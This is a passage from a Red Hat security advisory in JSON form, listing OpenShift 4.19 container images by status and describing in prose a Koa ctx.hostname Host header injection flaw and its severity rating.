"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:2848880f87cf2488a841e371c990a81b83e44e08e7e4b1599c2009f078080d85_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:5ec6c4b928751540b436763b99127acafab69b5dfc867cd4cf74871697327698_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:730d5918dbf2f364e8528b6c8036541fbbee9e81c1bd5f6985f87b4602bc4579_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:9fe8545ad96791b55050941f86c99eef5b8b88b927c0e1953ce3ee703b6bf525_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:233b4ee8499922834ec87e62c2d4f322062f8063c99a95010bcf817e6114af6e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:337f863c631718a87bb7c6f86491aab519c0885ab1fe4184dd33df493da56386_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:350c76802bc5210c06f8ee9ac9a4a7f2474505132c1eab2607bfab309f59e5f3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:43aa5f0fe9244c1aaf3912b184ffee644522a2ff3bd3aadd53db5b90b0c93c76_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:28f0a87cf08f7f9134bbe4ca64a7bc38a8882ecb5c8c6d57d5bb8f9096cdb76b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:4a986e828ec8120aa34ff2e35fe51c1866af855ea48e21d41aaeddcb4563a5d7_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:8fc1c4e8704ed03a5515293ed3b18f9cf2f72b57bf97f6f646f0c4b7dfd47d65_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:c8a812560939b0a79d1b687f36dd5c5b71d01bea059b07e3652b35678884d330_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:515b6d09bed60aa703612507005248bbda01c940605101e93897805a7f1e4666_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:b36db241db3e48fdc932865032dbedaf9d94816523648f4345f19acba26cd7f4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:e8b6d45610b94825d1f5525443529e99a5e68441a8f331e20746614a606dc475_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:f3405b744680f7e937609958ff100453abb5a7cff06344997be0b0a7b7fa29e3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:0df3b71023897418a185bfc7a38f4f67e0a41b6733452fefd59c9d7edbec3df6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:49afa7e1da94ce712c27df4a3e01d4748b2a493b4c61527a8a895c24e3001648_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:afbb2ca0948d8280647626e33064e6fc0d72310244cd69e338efdcc1b1ea7c8b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:e689a8391301d7ce3ba922d5fee8624e5d7f9c7a23905f78a7171d9a182d3f1c_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9-operator@sha256:93ddc3e527257964b98d041a3d830c1be67f8c781f93d562c328c1dee7b37ef1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9-operator@sha256:97611bba51f02868cd922555e6c8e75d7eb4b5d8a865a69fd957084f897a5033_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:3a47a587be70333ba3719bb416fb04c176e41ce27d2c051b1210717857fd9b92_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:d48293acc1ecfd8e08eed3f47d3c37eb9d5905642a04e12ed26434a222ed0476_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-cloud-controller-manager-rhel9@sha256:25f2667e3ce28ce5f0326be23f78cc6eedd523d4d2cdcfee2c02565d14d16ec2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-cloud-controller-manager-rhel9@sha256:ec8e975cdae392efc948e02d0a30b98809739aff380a856ec97e0367fd1d0179_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-machine-controllers-rhel9@sha256:70ec66ac0b28bc34120378d962fdfe8a2f2411591611eaf6df7d4e62b8076a7f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-machine-controllers-rhel9@sha256:cc3b4055bc35dcc6c701bca3092202adbdbf5edefe3737167475ee2431fc30c1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:2b9e95c24afe6cdf775027984310e0388433100034ef17e8de50160370019063_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:47e0ce843654534a810ad00a3b0703d8abbf4b8f221c479bae47cceed4d944e1_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:6c081df14b51b5bffaaf126426c8919de0821a460c3a7ec80abf95581b749609_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:7f52c583cdba43b214630766d8f050b322c936307f28e1951b47d2fdecd11acb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:470582fb21bf68d82be5cb2548bb4fd55827624330297d62b246a69b831153cd_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:a362b4e6bd7979c2413fe2bed3f66be4a44508bf397115caa539fa0857e26527_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:c0935ced156f72b3a6a77ff11445c038bd0555d881b73c760c7291cc7d27749b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:f434571500312f9a43f76fb244efb3184388fa6c34e955228612364918c8f1c8_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:5fa811100ce565454ba1e243b9d0b94ca6f9f630fe159d4a7de104eb844039e8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:a40105662b9188d283206418a2884182a9aff74c2cf4f700df3bd69443773d8c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:bde91bb377421a028e30bb830721f120be505c245717b5e2a3e25e5e6754bd5a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:e4ca2b3866c381b5fbbf8f6be7f9a34f4dd86ef1f952624e28760ce20ca3be64_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:07c0eed66aca1eed3b7897a24d97c00cb77f592f9b6900c7fb2644b4cfae6797_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:399d1be8fdde89d24d645044e04a0f5c0c105629896692c5e856a69d1bc6b076_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:62e2f95a2e6d53f00bfed8b866c40378bfb1219b72ba6b4e9478d4753fcfa623_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:7f8f9a3bce37f846d92e13388b17cff7e606c59abf74b88e8932cc4eb17f5828_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:395c76d76ca411005e4edc332331e1e36152ac788e1a54a02975ad3478a7f5de_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:53d9fba19f9ae47a65713eb4127c1f0c672a04cb55ec52861af3124dd2fe1e30_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:ceceb8b787ae6f1e9f00e32e4914456ae8dfe3f47c50efbf55ed0d1bb3f6c78a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:f99105f06107aae1f680d94d03d2f90607286c026aca50a877063235773368c7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:6f39433829144540b1030be91fecb0b225ec0212fe0e63f4ff50c7d1e9461a38_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:6fc27364a010efdbaeb7ede2c4aeaf867a8743d4fa9af5f9b6a16149f945de69_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:8ce1023bff832cada7cd5754986f8f2a7e24df72eee17707ff6df3acdab58465_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:e838bcfd2b1e7bb1376baff2a9e83cfb712b35be02767f62f10acc4edf5b4890_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:4371bbcc4e87a108d9c6f2121c9120a5abcf32240f2c5b8fa4d9ff9023821d81_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:4f7944def4efb736d1bb91507ce49497840db06495408913b57591fd2f72ed22_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:bb6e5818c800f72e4318c715666b51239050a3e7a7b6e7fdf96ec3b343a419af_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:cfd82e42cdba7e0724a9b0c5b90d42d526913ac96104e3ab6b449b59c3f5f3ad_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:355c8c7080214dbcd15bf77122550909eda1b1a5a1bcbc695ce80a495518b066_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:38a241d766a8321cfda212df868c63751fab60d99d8f05c671c07b39fc2dd2bf_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:4efb83eb7fca945c2f8bbb8c141c87bd4b7c4bd1ad09998e0e52259bcda88bd2_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:81ae7211c791e2b2e8f9ae37ba0c935e1b8dc8edef9c412058519e813518e6e7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:37a306bd6ec2676ed92426fc7e69cc2a3169013c31997f1144a1f22750309582_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:42985904fd805f7e3afeb21e514100045bc0fc77b7f7a8b81ce63c892d7eba70_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:6b6894e000302c61bc4eb20795f86491c14cddc1110e2534442b399d0e22ebdf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:a97fadbd51c77b4a854ecf0c403936adbf136dc83af3213fcc35fd6d5d67679e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:132bb73fc0ee5add8ea39eda9e4acfc0e3fab4ab85d2fb959e9a359dfe2b7b79_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:30c2d5c0f6ccd61860e95309dc27f8a1412cc6cf6173fef9a48461186f296336_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:6440ce5a0f8c34fea0b65fd43d8415c03d2c8c074f47efab4a2e47182a126c38_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:8c4b496454f9e8fe0bc85b5d4feb01c4c8ea0935d946b900ada2531d2c294ed3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:458198718ad90fe2caed08f8ae82b2ce996d62cc6455672db992e7f9bbacbcd3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:5e6e5206c98ab903f70b3e7402ac1d0c4342577038cb5810a268ba235502a717_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:60ec51c360f250cf70fdd2442b9def1ec17e2ded2cefe158995d701a0a7ec525_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:a116039d2376221a308ad495493553e704358e9cfc2fa4104785f7dd7242b90a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:05e68f45e8578ef2401473deda111a57de11143bb3cd63f84742cfc1bdbde1de_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:99d76e0fcc4bd0f276d574ea2edad252b552301aa10e2e4241e0e9462fdd03e7_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:d3fbf646c682c41b45e5ac529e3fa35abdb2610c2e746bfe19a7a12867165968_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:ff983c80717ff42cf4c6484fa4c38a1df4c88fd40d4e05fa3c47434d949d256b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9-operator@sha256:bcba79c5b4e0adf2cb63a96b2d7a089bc5a7ef0960ea5a54d50a36761ea7033e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9@sha256:79ffc4eed49cdd6aa9854d731ea9f85ed37af6e274c04359f048afea038ed48f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-cloud-controller-manager-rhel9@sha256:fdf18e2f91a8d7dfed9ab25f41666e1f3ff3c2a49866a1ff557629602b9f4726_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-cluster-api-controllers-rhel9@sha256:75c7ccaeda39a8ede8e78244478c7fb3dd03c1523ef3dcda8982cc8cc74a7aee_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9-operator@sha256:bcba79c5b4e0adf2cb63a96b2d7a089bc5a7ef0960ea5a54d50a36761ea7033e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9@sha256:79ffc4eed49cdd6aa9854d731ea9f85ed37af6e274c04359f048afea038ed48f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-csi-driver-syncer-rhel9@sha256:0d1f878c9d72ed2e0cf721f35015c55385df1eb3eb9bf966bb7d626f7826baf3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-problem-detector-rhel9@sha256:0925ab89d006b1b2665e701f3943ad2684e31ce86408919378014ecb7f7403ed_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:0f1cb5f6dd220cb36e689dfa996022085bafe7a06aa6b8f3e4737ca281e143c4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:27a24944f1ef11eb36634a670dc865b5ff0a15d2e11905b82498916d8e9bf580_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:dcffbfba5a93e392e08fb0d010fd9b75694c4411016d09852fc51239d5234e9d_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:fe3bfd4f788d5fe7258d04338de8ba9df4638db341674caed43859927f6ee3f9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:15d38afb007a612060445e5725ead06ed81130b761b11661e608a0debe464d24_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:4e69689cecf4ba62c9a3b7305e80c15ad5fcccbc85fb59a7e2969e14c7fb85f3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:a7a04880260ecec43abbfe7546f34ab6db488e82574cd7e9b0befa5399b601e8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:dbca06ba2c04ea72c1eb33a6c9d1c075016531eb9f72fc589fe759e55a57c408_s390x"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2442928"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Koa\u2019s ctx.hostname API used in Node.js applications. The function incorrectly parses specially crafted HTTP Host headers containing an @ character, which can cause the extracted hostname value to differ from the intended origin. An attacker can exploit this behavior by sending a malicious Host header to influence the hostname value returned by ctx.hostname. Applications that rely on this value for generating absolute URLs, password reset links, or email verification links without additional validation may be susceptible to Host header injection attacks.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "koa: Koa: Host header injection vulnerability due to malformed HTTP Host header parsing",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Red Hat Product Security considers this issue as High severity. \n\nA remote, unauthenticated attacker can send a specially crafted HTTP Host header containing a valid RFC 3986 userinfo component (using the @ delimiter). Due to improper parsing of the authority field in the ctx.hostname API, the application may treat attacker-controlled input as the hostname value. Exploitation occurs when the server processes the malicious request and does not require user interaction (UI:N).\n\nApplications that rely on ctx.hostname to construct absolute URLs, such as: password reset links, email verification links, OAuth redirect URIs, or webhook endpoints, may generate security sensitive URLs that reference an attacker controlled domain. This can result in integrity violations, including manipulation of authentication flows or account takeover scenarios. Integrity impact is therefore rated High.\n\nConfidentiality impact is considered Low because disclosure of sensitive data depends on application-specific usage patterns. The vulnerability does not automatically expose information from the server. However, if an affected application uses the manipulated hostname value to generate security-sensitive links such as password reset or email verification URLs and embeds tokens in those links without additional validation, a victim who later follows such a link may inadvertently disclose those tokens to an attacker controlled domain. Such disclosure is conditional, application-dependent like how the application constructs URLs. Also, the subsequent user interaction beyond the initial exploitation, the confidentiality impact is assessed as Low (C:L).",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:03d3c5b12eb66d08cacf9800def4bc0a0ca2561b8725fa897e943345e4bd441f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:210a2e800a6a8e3e7f577e3e8b62841d9c4fbf644d44fd927f66fee17709defc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:85748fc89666992382ee0059ff56f2ad103a2f066d2e84e270b8dd00fa699c45_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:c2c1f73f4ec1f7b91ebfc39a4282dddae2978a79150523a9c72748f50f7a2d89_arm64"
],
"known_not_affected": [
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a31c0d7654d2495710df721e8e1aa57ae47f028966ca83aaa1b74a5b57f0a276_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a657295bab1d29d15cdd77ce366dd388153b5783c054067ef0ecd1c84e76db4f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a95b88717fb16e809ea0b8654929e2808eb6fed3b84e45bbe3886e020d7acac4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:e5b07464aedee0bfb213c132174a22fc66e279eb8f7688078a07657237a8d334_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:4273b3050117faf7bb14fd2bbcf71c5606b7b6f1326fcc1a36cf3ed51f6b3de0_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:5a2ecf041953f1ac77ef2ff25b6ccbb1c7b7741bcca8eab2bdeae706019f6c83_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:9874d99c0cb18c7120982f093f99fde589255ef5cfb1c67b6a6e95cf66f87a91_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:e5c889f9c92df65efd279220829dc129023a34fd6c4b4d93264739852581cd93_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:35cd98a46072b8c966553d8bb60bc4ed2f3c055eeaf3e7c4d080ec9605f6a96f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:6a108c888888fc9a2fb0a3b834aab6eb2a6c0b691a39e3461725f87580062a91_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:6d2feee745979668785a904900f8c9d5327477f83361f26eb5879e87e081bd25_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:c17c46279d5ad92b5ad7a58a1dc1bb8331b15ab424e7274818a1c47898b528e2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:055fea2fc51b9eb48327b78542f420a1d65dbcf786324f7bcbeda053d3fd35bc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:1d66a8807c27cd43c86399e67ec86906edb97be4ca38b4a752bef1c880848083_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:980e2f5e0f0676e559e91d50e2927fb9bf2f598db0d1ba043440e04d76cf46b9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:dcd241b04a6e196ad8b66a9d3cce0df26f126e99a85ce7a5443e61dc76194e5b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:093a5ff464b31d0f1058c452843dd119dfd1798d91855dbe9fdbd5a45c912efb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:2320a5d225dccf8f02379818bee2e93ae87a8444698f20141f6a0425b1661601_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:46adf0538ec9fbd67abc4565c013f2503c2a11191de264310a2c770bfb566753_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:d48ca3a08fbb356d69be5b61274d75b701d48803a9d57c8d377ce2d0df83169a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:0b1b706bc5a0188d40950a1fdd30f8c410e68dd568ed7d07c1f09443fbde28f4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:173800cfc487973c018e8d9badb7d60d26509bbe0803e9a56fba1d5a65070dc0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:78a2368225915aca2a514c5d82ba82fff8e70e6123c08905c46839a821f4c8ab_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:e44aa77638b86f0ade3d4b69e150e8e9e95573ec90b6031224b87e404b5d6a79_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:313b7b7e1f619f5fd121ca2402d9db6876d021be227b496288809f63f1209561_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:5b232dcf5a47400d1b1d105895df8143b50dc74613b1463b275d6d304e0e0085_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:774dcaecbaa4f7b743b49c34a6a9889a27c6379110672a2f28fb4f83cb0f0fe6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:8d55cc650683e44676413797328fff9b3563eb78a1aae4cabe736b20e9f15ff4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:13cd27f7e445af565cef18a24ceca435b4ce2a0c99876b9ad087fdf50e343be6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:5eee15ae4f809e708dbba035fdf60bd2c331462bc6256df74f9124fac03be62b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:af94257f6dd0307527211d5ab2b77ff971d5432a003d4f8e2f1e884cf6ee5215_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:cba1849a3d647457c561e01daf7eda74d775430a8b95458684620c0ebb3f47d2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:1b9bd17c112e00f11fca3cfaea5908d0cd370598beb6909a3c00f58ca6774bee_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:2c646a3a35e8a4503f378096f6045fdb816fa9d5728cc14759748b7265aa47dc_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:47fd82ed75709dd28b0f9f2eab2a051e3bedac64d2fa11dc93a8a8a7159e287b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:e95f8dd80a31504ccf2ff1ea37026370e41edd179151f1c7c2901e5ed12c1296_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:65c161d7215a460b2295a2b4eb82e8bd7e2079e145596185f83d84c4676f1eed_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:8f7e2a8735cb9b09639c5a467b8656bd7dd1bd4f72bc50164f0e4623ffacd93c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:a045bd36d61b9586134423526ec66f4aa18c140958a01da59ffaa4003c229e4e_arm64",
